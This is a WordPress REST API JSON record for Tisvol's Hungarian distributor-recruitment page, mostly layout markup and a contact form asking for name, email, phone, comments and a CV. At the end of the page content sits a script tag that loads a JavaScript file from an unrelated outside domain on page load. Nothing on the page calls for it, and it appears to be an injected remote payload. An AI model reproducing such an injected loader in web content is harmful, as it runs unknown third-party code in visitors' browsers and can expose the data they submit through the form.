{"id":15041,"date":"2019-05-21T07:45:02","date_gmt":"2019-05-21T07:45:02","guid":{"rendered":"https:\/\/tisvol.com\/distribuidores-trabaja-con-nosotros\/"},"modified":"2019-12-04T04:27:17","modified_gmt":"2019-12-04T04:27:17","slug":"forgalmazok","status":"publish","type":"page","link":"https:\/\/tisvol.com\/hu\/forgalmazok\/","title":{"rendered":"Forgalmaz\u00f3k"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-33yw-fe4ace012c6b9c696b8bb8b31f28441a\">\n.avia-section.av-33yw-fe4ace012c6b9c696b8bb8b31f28441a{\nbackground-color:#ffffff;\nbackground-image:unset;\n}\n<\/style>\n<div id='tisvol-tagline'  class='avia-section av-33yw-fe4ace012c6b9c696b8bb8b31f28441a main_color avia-section-default avia-no-border-styling  avia-builder-el-0  el_before_av_layout_row  avia-builder-el-first  avia-bg-style-scroll container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><main  role=\"main\" itemprop=\"mainContentOfPage\"  class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15041'><div class='entry-content-wrapper clearfix'>\n<section  class='av_textblock_section av-jj8pzx7e-f58ee2657ad4a3ea48b2f1ff7d628b0b '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h3 style=\"text-align: center;\">Powered by Superior Quality<\/h3>\n<\/div><\/section>\n\n<\/div><\/div><\/main><!-- close content main element --><\/div><\/div><div id='trabaja-con-nosotros'  class='av-layout-grid-container av-ju88zi03-04efb4026491d32da786546c4a14f463 entry-content-wrapper main_color av-flex-cells  avia-builder-el-2  el_after_av_section  avia-builder-el-last  av-cell-min-height av-cell-min-height-100 grid-row-not-first  container_wrap sidebar_right'   data-av_minimum_height_pc='100'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-ju8909sh-bd7a6b5755051f0226868087720463c1\">\n.flex_cell.av-ju8909sh-bd7a6b5755051f0226868087720463c1{\nvertical-align:top;\n}\n.responsive #top #wrap_all .flex_cell.av-ju8909sh-bd7a6b5755051f0226868087720463c1{\npadding:5% 10% 5% 10% !important;\n}\n<\/style>\n<div class='flex_cell av-ju8909sh-bd7a6b5755051f0226868087720463c1 av-gridrow-cell av_one_half no_margin  avia-builder-el-3  el_before_av_cell_one_half  avia-builder-el-first  gradient-half-grey-to-white animation-element content-align-top'  ><div class='flex_cell_inner'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3oyoct-eb880fedd931a7c25b49a574d3104ed3\">\n.flex_column.av-3oyoct-eb880fedd931a7c25b49a574d3104ed3{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3oyoct-eb880fedd931a7c25b49a574d3104ed3 av_one_full  avia-builder-el-4  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jvxhqf6d-e5832bc198e9d97b9addb232ce740761\">\n#top .hr.hr-invisible.av-jvxhqf6d-e5832bc198e9d97b9addb232ce740761{\nheight:30px;\n}\n<\/style>\n<div  class='hr av-jvxhqf6d-e5832bc198e9d97b9addb232ce740761 hr-invisible  avia-builder-el-5  el_before_av_textblock  avia-builder-el-first '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-jj8rms6q-e378de6f514244f1a118e0085a2fbc7d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><div class=\"tisvol-diagonal\">\n<div><\/div>\n<\/div>\n<h2 class=\"titular-principal\" style=\"text-align: center;\">Dolgozzon vel\u00fcnk<\/h2>\n<h4 class=\"subtitular-principal\" style=\"text-align: center;\">&#8211;\u00a0Legyen Tisvol forgalmaz\u00f3 &#8211;<\/h4>\n<div class=\"tisvol-diagonal\">\n<div><\/div>\n<\/div>\n<\/div><\/section><br \/>\n<section  class='av_textblock_section av-jjzmlc6f-3bcaa9cdb11d755ffe71062062347395 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p style=\"text-align: center;\">Ha szeretn\u00e9 forgalmazni j\u00e1rm\u0171veinket, k\u00e9rj\u00fck, t\u00f6ltse ki ezt az \u0171rlapot a lehet\u0151 legt\u00f6bb inform\u00e1ci\u00f3val.<\/p>\n<\/div><\/section><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjzn8y8r-bca261f4ecd7d5ee520cdb35a14098e6\">\n#top .hr.hr-invisible.av-jjzn8y8r-bca261f4ecd7d5ee520cdb35a14098e6{\nheight:50px;\n}\n<\/style>\n<div  class='hr av-jjzn8y8r-bca261f4ecd7d5ee520cdb35a14098e6 hr-invisible  avia-builder-el-8  el_after_av_textblock  el_before_av_textblock '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-jjzmlc6f-3bcaa9cdb11d755ffe71062062347395 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p style=\"text-align: center;\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f15855-o1\" lang=\"\" dir=\"ltr\" data-wpcf7-id=\"15855\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/hu\/wp-json\/wp\/v2\/pages\/15041#wpcf7-f15855-o1\" method=\"post\" class=\"wpcf7-form init wpcf7-acceptance-as-validation\" aria-label=\"Kapcsolatfelv\u00e9teli \u0171rlap\" enctype=\"multipart\/form-data\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"15855\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f15855-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/><input type=\"hidden\" name=\"_wpcf7cf_hidden_group_fields\" value=\"[]\" \/><input type=\"hidden\" name=\"_wpcf7cf_hidden_groups\" value=\"[]\" \/><input type=\"hidden\" name=\"_wpcf7cf_visible_groups\" value=\"[]\" \/><input type=\"hidden\" name=\"_wpcf7cf_repeaters\" value=\"[]\" \/><input type=\"hidden\" name=\"_wpcf7cf_steps\" value=\"{}\" \/><input type=\"hidden\" name=\"_wpcf7cf_options\" value=\"{&quot;form_id&quot;:15855,&quot;conditions&quot;:[],&quot;settings&quot;:{&quot;animation&quot;:&quot;yes&quot;,&quot;animation_intime&quot;:200,&quot;animation_outtime&quot;:200,&quot;conditions_ui&quot;:&quot;normal&quot;,&quot;notice_dismissed&quot;:false,&quot;notice_dismissed_rollback-cf7-5.9.5&quot;:true,&quot;notice_dismissed_rollback-cf7-5.9.7&quot;:true,&quot;notice_dismissed_rollback-cf7-6.0.2&quot;:true}}\" \/><input type=\"hidden\" name=\"_wpcf7dtx_version\" value=\"5.0.5\" \/><input type=\"hidden\" name=\"_wpcf7_recaptcha_response\" value=\"\" \/>\n<\/fieldset>\n<div class=\"form-row\">\n\t<div class=\"form-col-50 form-col-first\">\n\t\t<p><label>N\u00e9v*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-name\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-name\" \/><\/span><\/label>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-col-50 form-col-last\">\n\t\t<p><label> Telefon<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"tel-57\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-text wpcf7-validates-as-tel\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"tel-57\" \/><\/span> <\/label>\n\t\t<\/p>\n\t<\/div>\n<\/div>\n<p><label> Email*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"your-email\" \/><\/span> <\/label>\n<\/p>\n<p><label> Megjegyz\u00e9sek<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-message\"><textarea cols=\"40\" rows=\"5\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\" name=\"your-message\"><\/textarea><\/span> <\/label>\n<\/p>\n<p><label> CV<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"file-393\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-file\" accept=\"audio\/*,video\/*,image\/*\" aria-invalid=\"false\" type=\"file\" name=\"file-393\" \/><\/span> <\/label>\n<\/p>\n<p><label> Anti-spam<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"quiz-488\"><label><span class=\"wpcf7-quiz-label\">2+4<\/span> <input size=\"40\" class=\"wpcf7-form-control wpcf7-quiz\" autocomplete=\"off\" aria-required=\"true\" aria-invalid=\"false\" type=\"text\" name=\"quiz-488\" \/><\/label><input type=\"hidden\" name=\"_wpcf7_quiz_answer_quiz-488\" value=\"412da74994453dc25f88683109d8a5e1\" \/><\/span> <\/label>\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"acceptance-156\"><span class=\"wpcf7-form-control wpcf7-acceptance\"><span class=\"wpcf7-list-item\"><label><input type=\"checkbox\" name=\"acceptance-156\" value=\"1\" aria-invalid=\"false\" \/><span class=\"wpcf7-list-item-label\">Elolvastam \u00e9s elfogadom a <a href=\"https:\/\/tisvol.com\/en\/legal-notice\/\" target=\"_blank\">titoktart\u00e1si ir\u00e1nyelveket<\/a> \u00e9s a szem\u00e9lyes adatok kezel\u00e9s\u00e9re vonatkoz\u00f3 felt\u00e9teleket.<\/span><\/label><\/span><\/span><\/span>\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"checkbox-370\"><span class=\"wpcf7-form-control wpcf7-checkbox\"><span class=\"wpcf7-list-item first last\"><input type=\"checkbox\" name=\"checkbox-370[]\" value=\"Elfogadom a rekl\u00e1manyagok k\u00fcld\u00e9s\u00e9t.\" \/><span class=\"wpcf7-list-item-label\">Elfogadom a rekl\u00e1manyagok k\u00fcld\u00e9s\u00e9t.<\/span><\/span><\/span><\/span>\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Elk\u00fcld\u00e9s\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/p>\n<\/div><\/section><\/p><\/div>\n<\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-2flg25-0e964e7b0a6b2b6b0315453c8f7e532d\">\n.flex_cell.av-2flg25-0e964e7b0a6b2b6b0315453c8f7e532d{\nvertical-align:top;\nbackground:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/04\/tisvol-coroa-coroa_panel_basculacion-1.jpg) 100% 50% no-repeat scroll ;\n}\n.responsive #top #wrap_all .flex_cell.av-2flg25-0e964e7b0a6b2b6b0315453c8f7e532d{\npadding:30px 30px 30px 30px !important;\n}\n<\/style>\n<div class='flex_cell av-2flg25-0e964e7b0a6b2b6b0315453c8f7e532d av-gridrow-cell av_one_half no_margin  avia-builder-el-10  el_after_av_cell_one_half  avia-builder-el-last  content-align-top avia-full-contain'  ><div class='flex_cell_inner'><\/div><\/div><\/div><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-15041","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages\/15041","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/comments?post=15041"}],"version-history":[{"count":0,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages\/15041\/revisions"}],"wp:attachment":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/media?parent=15041"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}